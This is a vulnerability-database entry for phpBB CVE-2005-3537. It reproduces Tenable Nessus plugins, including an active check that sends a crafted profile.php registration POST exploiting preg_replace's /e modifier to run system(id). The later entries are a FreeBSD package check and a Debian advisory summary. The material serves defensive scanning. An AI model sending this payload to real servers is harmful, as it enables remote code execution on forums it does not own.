Vulnerabilities > CVE-2005-3537 - Multiple Unspecified vulnerability in PHPBB

047910
CVSS 5.0 - MEDIUM
Attack vector
NETWORK
Attack complexity
LOW
Privileges required
NONE
Confidentiality impact
NONE
Integrity impact
PARTIAL
Availability impact
NONE
network
low complexity
phpbb-group
nessus

Summary

A "missing request validation" error in phpBB 2 before 2.0.18 allows remote attackers to edit private messages of other users, probably by modifying certain parameters or other inputs.

Nessus

  • NASL familyCGI abuses
    NASL idPHPBB_2_0_17.NASL
    descriptionThe remote host is running a version of phpBB that, if using PHP 5 with
    last seen2020-06-01
    modified2020-06-02
    plugin id20132
    published2005-11-02
    reporterThis script is Copyright (C) 2005-2018 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/20132
    titlephpBB <= 2.0.17 Multiple Vulnerabilities
    code
    #
    # (C) Tenable Network Security, Inc.
    #
    
    # Nessus plugin 20132: active (ACT_ATTACK) remote check for phpBB <= 2.0.17.
    # Detection order: (1) reuse the install path and version that phpbb_detect.nasl
    # stored in the KB, (2) send one crafted registration POST to profile.php and
    # grep the reply for evidence that server-side code ran, (3) only under
    # report_paranoia > 1, fall back to matching the version string alone.
    include("compat.inc");
    
    if (description) {
      script_id(20132);
      script_version("1.30");
    
      script_cve_id(
        "CVE-2005-3415", 
        "CVE-2005-3416", 
        "CVE-2005-3417", 
        "CVE-2005-3418",
        "CVE-2005-3419", 
        "CVE-2005-3420", 
        "CVE-2005-3536", 
        "CVE-2005-3537"
      );
      script_bugtraq_id(15243, 15246);
    
      script_name(english:"phpBB <= 2.0.17 Multiple Vulnerabilities");
      script_summary(english:"Checks for multiple vulnerabilities in phpBB <= 2.0.17");
    
      script_set_attribute(attribute:"synopsis", value:
    "The remote web server contains a PHP application that is affected by
    multiple vulnerabilities." );
      script_set_attribute(attribute:"description", value:
    "The remote host is running a version of phpBB that, if using PHP 5
    with 'register_globals' enabled, fails to properly deregister global
    variables as well as failing to initialize several variables in various
    scripts.  An attacker may be able to exploit these issues to execute
    arbitrary code or to conduct SQL injection and cross-site scripting
    attacks." );
      script_set_attribute(attribute:"see_also", value:"http://www.hardened-php.net/advisory_172005.75.html" );
      script_set_attribute(attribute:"see_also", value:"https://www.phpbb.com/community/viewtopic.php?f=14&t=336756" );
      script_set_attribute(attribute:"solution", value:
    "Upgrade to phpBB version 2.0.18 or later." );
      script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
      script_set_cvss_temporal_vector("CVSS2#E:U/RL:OF/RC:C");
      script_set_attribute(attribute:"exploitability_ease", value:"No exploit is required");
      script_set_attribute(attribute:"exploit_available", value:"false");
     script_cwe_id(20, 74, 79, 442, 629, 711, 712, 722, 725, 750, 751, 800, 801, 809, 811, 864, 900, 928, 931, 990);
    
     script_set_attribute(attribute:"plugin_publication_date", value: "2005/11/02");
     script_set_attribute(attribute:"vuln_publication_date", value: "2005/10/31");
     script_cvs_date("Date: 2018/11/15 20:50:18");
      script_set_attribute(attribute:"plugin_type", value:"remote");
      script_set_attribute(attribute:"cpe",value:"cpe:/a:phpbb_group:phpbb");
      script_end_attributes();
     
      # ACT_ATTACK: this plugin sends a payload to the target (the POST below)
      # rather than only reading banners; schedule it accordingly.
      script_category(ACT_ATTACK);
      script_family(english:"CGI abuses");
    
      script_copyright(english:"This script is Copyright (C) 2005-2018 and is owned by Tenable, Inc. or an Affiliate thereof.");
    
      script_dependencies("phpbb_detect.nasl");
      script_exclude_keys("Settings/disable_cgi_scanning");
      script_require_ports("Services/www", 80);
      script_require_keys("www/phpBB");
      exit(0);
    }
    
    
    include("global_settings.inc");
    include("misc_func.inc");
    include("http.inc");
    include("data_protection.inc");
    
    # Only web ports that can run PHP are worth probing; anything else exits quietly.
    port = get_http_port(default:80);
    if (!can_host_php(port:port)) exit(0);
    
    
    # Test an install.
    # The detection plugin stores one "<version> under <dir>" string per port;
    # both halves are needed below (version for the fallback, dir for the request).
    install = get_kb_item(string("www/", port, "/phpBB"));
    if (isnull(install)) exit(0);
    matches = eregmatch(string:install, pattern:"^(.+) under (/.*)$");
    if (!isnull(matches)) {
      ver = matches[1];
      dir = matches[2];
    
      # Check whether the profile.php script exists.
      r = http_send_recv3(method: "GET", item:string(dir, "/profile.php?mode=register"), port:port);
      # NOTE(review): a failed request exits with no audit() message, so a host
      # that stops answering is reported the same way as a non-vulnerable one.
      if (isnull(r)) exit(0);
      res = r[2];
    
      # If it does...
      if ('href="profile.php?mode=register&amp;sid=' >< res) {
        # Try to exploit some of the flaws to run a command.
        exploit = "system(id)";
        postdata = string(
          "mode=register&",
          "agreed=true&",
          # nb: sets $error in "includes/usercp_register.php".
          "language=1&",
          # nb: causes array_merge() to fail in "common.php" w/ PHP5 so we avoid
          #     deregistering 'signature' and 'signature_bbcode_uid'.
          "HTTP_SESSION_VARS=1&",
          # nb: specifies our exploit.
          "signature=:", exploit, "&",
          # nb: injects the "e" modifier into preg_replace; 
          #     the null-byte requires magic_quotes to be off.
          "signature_bbcode_uid=(.*)/e%00"
        );
        r = http_send_recv3(method: "POST", port: port,
          item: string(dir, "/profile.php?mode=register"), 
          content_type: "application/x-www-form-urlencoded",
          data: postdata );
        if (isnull(r)) exit(0);
        res = r[2];
    
        # There's a problem if we were able to run our command.
        # NOTE(review): this pattern matches a passwd-style "root:...:0:0:" line,
        # while the payload above runs `id`, whose output starts with "uid=".
        # Confirm which output the check is meant to recognise; as written the
        # two do not obviously agree, which would make the active check never fire.
        if (egrep(pattern:"root:.*:0:[01]:", string:res)) {
          if (report_verbosity > 0) {
            # Narrow the evidence to the echoed signature field (the text between
            # the <textarea name="signature"> open tag and </textarea>) so the
            # report carries the command output rather than the whole page.
            output = strstr(res, '<textarea name="signature"');
            if (output) {
              output = output - strstr(output, "</textarea>");
              output = strstr(output, ">");
              output = output - ">";
            }
            else
    	        output = res;
            # Redact the captured output before it is written to the report;
            # the exact redaction rules live in data_protection.inc.
            output = data_protection::sanitize_uid(output:output);
            security_hole(port:port, extra: output);
          }
          else
            security_hole(port:port);
    
          # Record the derived findings in the KB for other plugins on this port.
          set_kb_item(name: 'www/'+port+'/XSS', value: TRUE);
          set_kb_item(name: 'www/'+port+'/SQLInjection', value: TRUE);
          exit(0);
        }
      }
    
      # If we're being paranoid.
      # Version-only fallback: lower confidence (the active check above failed or
      # never ran), so it is gated behind report_paranoia > 1 and the report text
      # says explicitly that only the version number was consulted.
      if (report_paranoia > 1) {
        # Report if the version number <= 2.0.17 as the exploit might have failed.
        # NOTE(review): the pattern is unanchored; the "[01]\." alternative also
        # matches the "0." inside a string such as "3.0.1", so a paranoid scan could
        # flag a phpBB 3.x version string. Anchoring the pattern with "^" would
        # tighten it.
        if (ver =~ "([01]\.|2\.0\.([0-9]($|[^0-9])|1[0-7]))") {
          security_hole(port:port, extra: "
    ***** Nessus has determined the vulnerability exists on the remote
    ***** host simply by looking at the version number of phpBB
    ***** installed there.
    ");
    
          set_kb_item(name: 'www/'+port+'/XSS', value: TRUE);
          set_kb_item(name: 'www/'+port+'/SQLInjection', value: TRUE);
          exit(0);
        }
      }
    }
    
  • NASL familyFreeBSD Local Security Checks
    NASL idFREEBSD_PKG_28C9243A72ED11DA8C1D000E0C2E438A.NASL
    descriptionMultiple vulnerabilities have been reported within phpbb. phpbb is proven vulnerable to : - script insertion, - bypassing of protection mechanisms, - multiple cross site scripting vulnerabilities, - SQL injection, - arbitrary code execution
    last seen2020-06-01
    modified2020-06-02
    plugin id21405
    published2006-05-13
    reporterThis script is Copyright (C) 2006-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/21405
    titleFreeBSD : phpbb -- multiple vulnerabilities (28c9243a-72ed-11da-8c1d-000e0c2e438a)
    code
    #%NASL_MIN_LEVEL 80502
    #
    # (C) Tenable Network Security, Inc.
    #
    # The descriptive text and package checks in this plugin were  
    # extracted from the FreeBSD VuXML database :
    #
    # Copyright 2003-2018 Jacques Vidrine and contributors
    #
    # Redistribution and use in source (VuXML) and 'compiled' forms (SGML,
    # HTML, PDF, PostScript, RTF and so forth) with or without modification,
    # are permitted provided that the following conditions are met:
    # 1. Redistributions of source code (VuXML) must retain the above
    #    copyright notice, this list of conditions and the following
    #    disclaimer as the first lines of this file unmodified.
    # 2. Redistributions in compiled form (transformed to other DTDs,
    #    published online in any format, converted to PDF, PostScript,
    #    RTF and other formats) must reproduce the above copyright
    #    notice, this list of conditions and the following disclaimer
    #    in the documentation and/or other materials provided with the
    #    distribution.
    # 
    # THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS "AS IS"
    # AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
    # THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
    # PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS
    # BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,
    # OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT
    # OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR
    # BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
    # WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE
    # OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,
    # EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
    #
    
    # Nessus plugin 21405: local package-version check for FreeBSD, generated
    # from VuXML entry 28c9243a-72ed-11da-8c1d-000e0c2e438a. It never contacts
    # the web application; it only compares the installed package versions held
    # in the KB against the fixed release.
    include("compat.inc");
    
    if (description)
    {
      script_id(21405);
      script_version("1.18");
      script_cvs_date("Date: 2019/08/02 13:32:38");
    
      script_cve_id("CVE-2005-3310", "CVE-2005-3415", "CVE-2005-3416", "CVE-2005-3417", "CVE-2005-3418", "CVE-2005-3419", "CVE-2005-3420", "CVE-2005-3536", "CVE-2005-3537");
      script_bugtraq_id(15170, 15243);
    
      script_name(english:"FreeBSD : phpbb -- multiple vulnerabilities (28c9243a-72ed-11da-8c1d-000e0c2e438a)");
      script_summary(english:"Checks for updated packages in pkg_info output");
    
      script_set_attribute(
        attribute:"synopsis", 
        value:
    "The remote FreeBSD host is missing one or more security-related
    updates."
      );
      script_set_attribute(
        attribute:"description", 
        value:
    "Multiple vulnerabilities have been reported within phpbb. phpbb is
    proven vulnerable to :
    
    - script insertion,
    
    - bypassing of protetion mechanisms,
    
    - multiple cross site scripting vulnerabilities,
    
    - SQL injection,
    
    - arbitrary code execution"
      );
      # http://marc.theaimsgroup.com/?l=bugtraq&m=113017003617987
      script_set_attribute(
        attribute:"see_also",
        value:"https://marc.info/?l=bugtraq&m=113017003617987"
      );
      script_set_attribute(
        attribute:"see_also",
        value:"http://www.hardened-php.net/advisory_172005.75.html"
      );
      # https://vuxml.freebsd.org/freebsd/28c9243a-72ed-11da-8c1d-000e0c2e438a.html
      script_set_attribute(
        attribute:"see_also",
        value:"http://www.nessus.org/u?165af3e7"
      );
      script_set_attribute(attribute:"solution", value:"Update the affected packages.");
      script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
      script_set_cvss_temporal_vector("CVSS2#E:U/RL:OF/RC:C");
      script_set_attribute(attribute:"exploitability_ease", value:"No known exploits are available");
      script_set_attribute(attribute:"exploit_available", value:"false");
    
      script_set_attribute(attribute:"plugin_type", value:"local");
      # Two package names are covered: the base port and the zh-phpbb-tw
      # localisation; the pkg_test() calls below check the same two.
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:freebsd:freebsd:phpbb");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:freebsd:freebsd:zh-phpbb-tw");
      script_set_attribute(attribute:"cpe", value:"cpe:/o:freebsd:freebsd");
    
      script_set_attribute(attribute:"vuln_publication_date", value:"2005/10/24");
      script_set_attribute(attribute:"patch_publication_date", value:"2006/02/16");
      script_set_attribute(attribute:"plugin_publication_date", value:"2006/05/13");
      script_end_attributes();
    
      # ACT_GATHER_INFO: read-only; no traffic is sent to the affected application.
      script_category(ACT_GATHER_INFO);
      script_copyright(english:"This script is Copyright (C) 2006-2019 and is owned by Tenable, Inc. or an Affiliate thereof.");
      script_family(english:"FreeBSD Local Security Checks");
    
      script_dependencies("ssh_get_info.nasl");
      script_require_keys("Host/local_checks_enabled", "Host/FreeBSD/release", "Host/FreeBSD/pkg_info");
    
      exit(0);
    }
    
    
    include("audit.inc");
    include("freebsd_package.inc");
    
    
    # Prerequisites: the KB keys required above must be present (presumably
    # populated by the ssh_get_info.nasl dependency); audit() exits with a
    # specific reason for each missing one instead of a silent exit(0).
    if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);
    if (!get_kb_item("Host/FreeBSD/release")) audit(AUDIT_OS_NOT, "FreeBSD");
    if (!get_kb_item("Host/FreeBSD/pkg_info")) audit(AUDIT_PACKAGE_LIST_MISSING);
    
    
    # Number of installed packages found below the fixed version.
    flag = 0;
    
    # 2.0.18 is the first fixed release for both package names. save_report:TRUE
    # presumably keeps the matching package lines for pkg_report_get() below.
    if (pkg_test(save_report:TRUE, pkg:"phpbb<2.0.18")) flag++;
    if (pkg_test(save_report:TRUE, pkg:"zh-phpbb-tw<2.0.18")) flag++;
    
    # One host-level finding (port 0, no network service involved), with the
    # package details attached when verbose; otherwise record the host as unaffected.
    if (flag)
    {
      if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());
      else security_hole(0);
      exit(0);
    }
    else audit(AUDIT_HOST_NOT, "affected");
    
  • NASL familyDebian Local Security Checks
    NASL idDEBIAN_DSA-925.NASL
    descriptionSeveral vulnerabilities have been discovered in phpBB, a fully featured and skinnable flat webforum. The Common Vulnerabilities and Exposures project identifies the following problems : - CVE-2005-3310 Multiple interpretation errors allow remote authenticated users to inject arbitrary web script when remote avatars and avatar uploading are enabled. - CVE-2005-3415 phpBB allows remote attackers to bypass protection mechanisms that deregister global variables that allows attackers to manipulate the behaviour of phpBB. - CVE-2005-3416 phpBB allows remote attackers to bypass security checks when register_globals is enabled and the session_start function has not been called to handle a session. - CVE-2005-3417 phpBB allows remote attackers to modify global variables and bypass security mechanisms. - CVE-2005-3418 Multiple cross-site scripting (XSS) vulnerabilities allow remote attackers to inject arbitrary web scripts. - CVE-2005-3419 A SQL injection vulnerability allows remote attackers to execute arbitrary SQL commands. - CVE-2005-3420 phpBB allows remote attackers to modify regular expressions and execute PHP code via the signature_bbcode_uid parameter. - CVE-2005-3536 Missing input sanitising of the topic type allows remote attackers to inject arbitrary SQL commands. - CVE-2005-3537 Missing request validation permitted remote attackers to edit private messages of other users.
    last seen2020-06-01
    modified2020-06-02
    plugin id22791
    published2006-10-14
    reporterThis script is Copyright (C) 2006-2019 Tenable Network Security, Inc.
    sourcehttps://www.tenable.com/plugins/nessus/22791
    titleDebian DSA-925-1 : phpbb2 - several vulnerabilities